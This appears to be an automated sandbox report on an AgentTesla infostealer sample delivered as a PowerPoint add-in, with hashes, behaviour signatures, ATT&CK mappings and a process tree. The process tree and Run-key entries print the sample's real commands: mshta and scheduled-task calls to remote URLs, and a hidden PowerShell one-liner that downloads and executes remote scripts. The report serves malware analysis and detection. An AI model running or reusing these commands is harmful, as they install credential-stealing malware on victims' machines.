agenttesla | deef43f7490a5db9f8f9b688d8bc669ecc360d068e3b40e39de124f85068db2e

General

Target

13.ppam
Size

6KB
MD5

03bbdcead22e9329a234dc39f55f0a2b
SHA1

465b5a304541a673ce583bc20d2dc4746ccec421
SHA256

deef43f7490a5db9f8f9b688d8bc669ecc360d068e3b40e39de124f85068db2e
SHA512

af1dde717ee4c195dd32873ed4205d8b98fcc783bc4379360db084ebb4275ff78361c3be69722698f214f5493205d0753ff9748497ffeee88449077f04031529

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3640	2868	mshta.exe	POWERPNT.EXE

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3884-317-0x000000000043753E-mapping.dmp	family_agenttesla
behavioral2/memory/1944-384-0x000000000043753E-mapping.dmp	family_agenttesla
behavioral2/memory/1944-390-0x0000000005760000-0x0000000005C5E000-memory.dmp	family_agenttesla

Blocklisted process makes network request 15 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
30	3640	mshta.exe
32	3640	mshta.exe
35	3640	mshta.exe
37	3640	mshta.exe
39	3640	mshta.exe
41	3640	mshta.exe
42	3640	mshta.exe
48	3640	mshta.exe
51	3640	mshta.exe
52	3640	mshta.exe
55	3640	mshta.exe
56	3640	mshta.exe
58	3640	mshta.exe
59	3640	mshta.exe
61	1760	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

jsc.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/14.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/14.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/14.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_974d936d2f6d4e52831d05712c24a1c9.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_fca89e4173af436497e274a5e70b6145.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1760 set thread context of 3884	1760	powershell.exe	jsc.exe
PID 1760 set thread context of 1944	1760	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1352 schtasks.exe

pid	process
1352	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2656 taskkill.exe
3848 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

2868 POWERPNT.EXE

pid	process
2656	taskkill.exe
3848	taskkill.exe

pid	process
2868	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid	process
2820	dw20.exe
2820	dw20.exe
1760	powershell.exe
1760	powershell.exe
1760	powershell.exe
1760	powershell.exe
1760	powershell.exe
3884	jsc.exe
3884	jsc.exe
1944	RegAsm.exe
1944	RegAsm.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

1944 RegAsm.exe

pid	process
1944	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	3848	taskkill.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	3884	jsc.exe
Token: SeDebugPrivilege	1944	RegAsm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

POWERPNT.EXE

pid process

2868 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

2868 POWERPNT.EXE
2868 POWERPNT.EXE
2868 POWERPNT.EXE
3884 jsc.exe
1944 RegAsm.exe

pid	process
2868	POWERPNT.EXE

pid	process
2868	POWERPNT.EXE
2868	POWERPNT.EXE
2868	POWERPNT.EXE
3884	jsc.exe
1944	RegAsm.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 2868 wrote to memory of 3640	2868	POWERPNT.EXE	mshta.exe
PID 2868 wrote to memory of 3640	2868	POWERPNT.EXE	mshta.exe
PID 3640 wrote to memory of 3848	3640	mshta.exe	taskkill.exe
PID 3640 wrote to memory of 3848	3640	mshta.exe	taskkill.exe
PID 3640 wrote to memory of 2656	3640	mshta.exe	taskkill.exe
PID 3640 wrote to memory of 2656	3640	mshta.exe	taskkill.exe
PID 3640 wrote to memory of 1352	3640	mshta.exe	schtasks.exe
PID 3640 wrote to memory of 1352	3640	mshta.exe	schtasks.exe
PID 3640 wrote to memory of 2820	3640	mshta.exe	dw20.exe
PID 3640 wrote to memory of 2820	3640	mshta.exe	dw20.exe
PID 3640 wrote to memory of 1760	3640	mshta.exe	powershell.exe
PID 3640 wrote to memory of 1760	3640	mshta.exe	powershell.exe
PID 1760 wrote to memory of 384	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 384	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 384	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3884	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3884	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3884	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3884	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3884	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3884	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3884	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3884	1760	powershell.exe	jsc.exe
PID 1760 wrote to memory of 3308	1760	powershell.exe	csc.exe
PID 1760 wrote to memory of 3308	1760	powershell.exe	csc.exe
PID 3308 wrote to memory of 2232	3308	csc.exe	cvtres.exe
PID 3308 wrote to memory of 2232	3308	csc.exe	cvtres.exe
PID 1760 wrote to memory of 1944	1760	powershell.exe	RegAsm.exe
PID 1760 wrote to memory of 1944	1760	powershell.exe	RegAsm.exe
PID 1760 wrote to memory of 1944	1760	powershell.exe	RegAsm.exe
PID 1760 wrote to memory of 1944	1760	powershell.exe	RegAsm.exe
PID 1760 wrote to memory of 1944	1760	powershell.exe	RegAsm.exe
PID 1760 wrote to memory of 1944	1760	powershell.exe	RegAsm.exe
PID 1760 wrote to memory of 1944	1760	powershell.exe	RegAsm.exe
PID 1760 wrote to memory of 1944	1760	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

outlook_win_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\13.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Windows\SYSTEM32\mshta.exe
  mshta.exe https://www.bitly.com/kddjkdwokddwodkwodki
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3640
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3848
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2656
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/14.html\""
    3⤵
    - Creates scheduled task(s)
    PID:1352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_974d936d2f6d4e52831d05712c24a1c9.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_fca89e4173af436497e274a5e70b6145.txt').GetResponse().GetResponseStream()).ReadToend());
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      4⤵
      PID:384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      4⤵
      Drops file in Drivers directory
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      outlook_office_path
      outlook_win_path
      PID:3884
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\epqj0b5e\epqj0b5e.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3308
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4A2.tmp" "c:\Users\Admin\AppData\Local\Temp\epqj0b5e\CSC10969D89A25749C7BCF34F9BD0EC9A58.TMP"
        5⤵
        
        PID:2232
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Drops file in Drivers directory
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: SetClipboardViewer
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1944
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    dw20.exe -x -s 2880
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2820

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESF4A2.tmp

MD5
082c6f73aeba17ee8ad8b7f109e24d45

SHA1
fb62d58078c52da4331f0314960a1d17cf0aa229

SHA256
c6c7b6670414f4eaad07451ffb4fa71f87ceee60dad1427c80f4f9768cea5b49

SHA512
57bdd1aa5d79261bd17e28b736f96845e672f1b5cfb1de70d5faa000ddeb9a21af5da807b4b3c2c2dc231fc97479d48aff9bd07360caae875356b6e531a54bc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\epqj0b5e\epqj0b5e.dll

MD5
254231d867439b16b279905f7f3c4f39

SHA1
bed090e9c19f3e1125911c94acad20e069dbb574

SHA256
7745e866698ef3f41ff00723751494d7deda701d76e64d07789e04604bffde37

SHA512
7e041f683d2e7226f5cb19128c6a748f21aa11213b00dd1c751a545f63ab3735236f9af147f02883e3a652ba5329888a9b41cb2a13e7c1c64398d70969eb7484

Download Submit
C:\Windows\system32\drivers\etc\hosts

MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\epqj0b5e\CSC10969D89A25749C7BCF34F9BD0EC9A58.TMP

MD5
ecaec37a657245418541f237b828757b

SHA1
c0d75ad89e121d99e77d85f6923503370f909e34

SHA256
1308c0f50f5e3c9fec657cf5afd82e8bcfe77a357f24f1ab54968e5ff07d77f1

SHA512
58116b877d1054894ec4d20aec7e52afc9fead348598084132a7f895f8b310fcf0f7f9bd3b5fdc2c913398ad22b1fc16d8b24d826a593a7fa8043f024b54dcb3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\epqj0b5e\epqj0b5e.0.cs

MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\epqj0b5e\epqj0b5e.cmdline

MD5
991ce9a02de35ca3178a3e5498dfb54d

SHA1
06321ae74ad2b9724993c4019ecc38bbed99852a

SHA256
45013b5d9799ed21be9cb16ec5d4722977a8391cf52830741abe26fcd1b25957

SHA512
6ac4812b505d0bbe97f7c4090b694c7150953ece785aa7e67a60289bad1b269326142cd41ce7d043edc245df509f4a8c21183a79b23bd1e6fd25b54d57222e95

Download Submit
memory/1352-290-0x0000000000000000-mapping.dmp

Download
memory/1760-312-0x0000026C5B216000-0x0000026C5B218000-memory.dmp

Filesize
8KB

Download
memory/1760-309-0x0000026C5B213000-0x0000026C5B215000-memory.dmp

Filesize
8KB

Download
memory/1760-308-0x0000026C5B210000-0x0000026C5B212000-memory.dmp

Filesize
8KB

Download
memory/1760-292-0x0000000000000000-mapping.dmp

Download
memory/1944-384-0x000000000043753E-mapping.dmp

Download
memory/1944-390-0x0000000005760000-0x0000000005C5E000-memory.dmp

Filesize
5.0MB

Download
memory/1944-401-0x0000000005760000-0x0000000005C5E000-memory.dmp

Filesize
5.0MB

Download
memory/2232-378-0x0000000000000000-mapping.dmp

Download
memory/2656-283-0x0000000000000000-mapping.dmp

Download
memory/2820-291-0x0000000000000000-mapping.dmp

Download
memory/2868-121-0x000001E8D24C0000-0x000001E8D24C2000-memory.dmp

Filesize
8KB

Download
memory/2868-119-0x00007FFA03070000-0x00007FFA03080000-memory.dmp

Filesize
64KB

Download
memory/2868-116-0x00007FFA03070000-0x00007FFA03080000-memory.dmp

Filesize
64KB

Download
memory/2868-117-0x00007FFA03070000-0x00007FFA03080000-memory.dmp

Filesize
64KB

Download
memory/2868-118-0x00007FFA03070000-0x00007FFA03080000-memory.dmp

Filesize
64KB

Download
memory/2868-129-0x00007FFA001C0000-0x00007FFA001D0000-memory.dmp

Filesize
64KB

Download
memory/2868-128-0x00007FFA001C0000-0x00007FFA001D0000-memory.dmp

Filesize
64KB

Download
memory/2868-115-0x00007FFA03070000-0x00007FFA03080000-memory.dmp

Filesize
64KB

Download
memory/2868-122-0x000001E8D24C0000-0x000001E8D24C2000-memory.dmp

Filesize
8KB

Download
memory/2868-120-0x000001E8D24C0000-0x000001E8D24C2000-memory.dmp

Filesize
8KB

Download
memory/3308-375-0x0000000000000000-mapping.dmp

Download
memory/3640-256-0x0000000000000000-mapping.dmp

Download
memory/3848-282-0x0000000000000000-mapping.dmp

Download
memory/3884-374-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/3884-400-0x0000000005031000-0x0000000005032000-memory.dmp

Filesize
4KB

Download
memory/3884-317-0x000000000043753E-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads